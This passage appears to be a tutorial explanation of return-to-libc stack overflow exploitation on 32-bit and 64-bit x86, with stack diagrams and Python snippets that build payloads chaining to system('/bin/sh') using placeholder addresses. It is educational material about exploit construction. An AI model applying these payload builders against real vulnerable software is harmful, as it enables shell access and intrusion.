This is because on x86 the stack grows downwards (towards lower addresses), while buffers are filled upwards (towards higher addresses).
When you write past the end of the buffer, you clobber the saved return address, which sits above the buffer at a higher address.
The ret instruction will then pop the return address off the stack and continue execution at the beginning of system. Then system reads its argument from the stack and, upon returning, pops the address of the next function off the stack. In other words, the stack shrinks as you go through the chain, and the stack pointer moves towards higher addresses.
The reason that the address of /bin/sh can be written on the stack lies in the calling convention used by gcc on 32-bit x86 Linux, which is very close to the System V calling convention (see Figure 3-15) and passes function arguments on the stack. In contrast, on x86_64 the first arguments are passed in registers (rdi, rsi, rdx, rcx, r8, r9), so you would need a pop rdi; ret gadget before you can return to system.
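For comparison, here is a minimal sketch of what the x86_64 variant of the chain might look like in Python. The offset and every address below are made-up placeholders (assumptions, not taken from any real binary), and the helper names are hypothetical; the point is only the ordering: the gadget first, then the value it pops into rdi, then system.

```python
import struct

def p64(value):
    """Pack an integer as a 64-bit little-endian word."""
    return struct.pack("<Q", value)

# Hypothetical values, for illustration only.
OFFSET_TO_RET_64 = 72                # bytes from buffer start to saved return address
POP_RDI_RET      = 0x00000000004011d3  # assumed address of a "pop rdi; ret" gadget
BINSH_ADDR_64    = 0x00007ffff7f5a0cf  # assumed address of the string "/bin/sh"
SYSTEM_ADDR_64   = 0x00007ffff7e12420  # assumed address of system

def build_payload64():
    chain  = b"A" * OFFSET_TO_RET_64  # fills the buffer up to the return address
    chain += p64(POP_RDI_RET)         # victim's ret lands on the gadget
    chain += p64(BINSH_ADDR_64)       # popped into rdi by the gadget
    chain += p64(SYSTEM_ADDR_64)      # the gadget's ret continues in system
    return chain

payload64 = build_payload64()
```

The argument no longer sits above the return address of system; it is consumed by the gadget before system is ever entered.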
To understand the order of the values written to the stack, let's look at a single stack frame:
         high addresses
       +----------------+
       |                |
       |   arguments    |
       |                |
       +----------------+
esp -> | return address |
       +----------------+
       |                |
       |     locals     |
       |                |
       +----------------+
         low addresses
Putting this together into a payload, we get:
         high addresses
       +----------------+             -+
       |      arg0      |              |
       +----------------+              | stack frame of system
       | return address |  exit        |
       +----------------+             -+
esp -> | return address |  system      |
       +----------------+              |
       |                |  ^           | stack frame of victim
       |     buffer     |  | overflow  |
       |                |  +           |
       + . . . . . . . .+              :
         low addresses
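As a rough illustration, the layout in the diagram above could be assembled like this in Python. The offset and all three addresses are made-up placeholders (assumptions, not values from any real binary); for an actual target you would have to determine them yourself, for example with a debugger.

```python
import struct

def p32(value):
    """Pack an integer as a 32-bit little-endian word, as x86 stores it."""
    return struct.pack("<I", value)

# Hypothetical values, for illustration only.
OFFSET_TO_RET = 76           # bytes from buffer start to saved return address
SYSTEM_ADDR   = 0xf7e12420   # assumed address of system
EXIT_ADDR     = 0xf7e05f80   # assumed address of exit
BINSH_ADDR    = 0xf7f5a0cf   # assumed address of the string "/bin/sh"

def build_payload():
    payload  = b"A" * OFFSET_TO_RET  # fills the buffer (lowest addresses)
    payload += p32(SYSTEM_ADDR)      # overwrites the victim's return address
    payload += p32(EXIT_ADDR)        # return address seen by system
    payload += p32(BINSH_ADDR)       # arg0 of system (highest address)
    return payload

payload = build_payload()
```

Note that the bytes are written from low to high addresses, so the payload reads bottom-to-top relative to the diagram.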
The buffer being overflowed is a local buffer in the victim function, and the victim's saved return address gets overwritten. The ret instruction will pop that return address off the stack into eip, so execution will continue in system.
At this point, the stack looks like this, with the space below esp usable by system for its locals (strictly speaking, the diagram is simplified: as system allocates its locals, the stack pointer will of course decrease further):
         high addresses
       +----------------+             -+
       |      arg0      |              |
       +----------------+              | stack frame of system
esp -> | return address |  exit        |
       +----------------+              |
       |                |              |
       |     locals     |              |
       |                |              |
       + . . . . . . . .+              :
         low addresses
To access the argument, system will use the [reg+displacement] addressing mode: on entry, the argument is at [esp+4] (or at [ebp+8] once a frame pointer has been set up). At the end of its execution, it will execute ret, which will continue execution in exit.
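The walk through the chain can be replayed with a toy model in Python. This is only a sketch: memory is a dictionary of 32-bit words, and the stack addresses and function addresses are invented for illustration.

```python
# Hypothetical addresses, for illustration only.
SYSTEM, EXIT, BINSH = 0x1000, 0x2000, 0x3000

# Memory modelled as {address: 32-bit word}. The victim's saved return
# address sits at 0xff00, with the rest of the payload above it.
stack = {0xff00: SYSTEM, 0xff04: EXIT, 0xff08: BINSH}

def ret(esp):
    """Model ret: pop the word at esp into eip, then add 4 to esp."""
    return stack[esp], esp + 4

esp = 0xff00
eip_after_victim, esp = ret(esp)   # victim returns: eip = system
esp_at_system_entry = esp          # esp now points at system's return address
arg0 = stack[esp + 4]              # system finds its argument at [esp+4]
eip_after_system, esp = ret(esp)   # system returns (locals released): eip = exit
```

Each ret moves esp four bytes towards higher addresses, which is the stack shrinking as the chain is consumed.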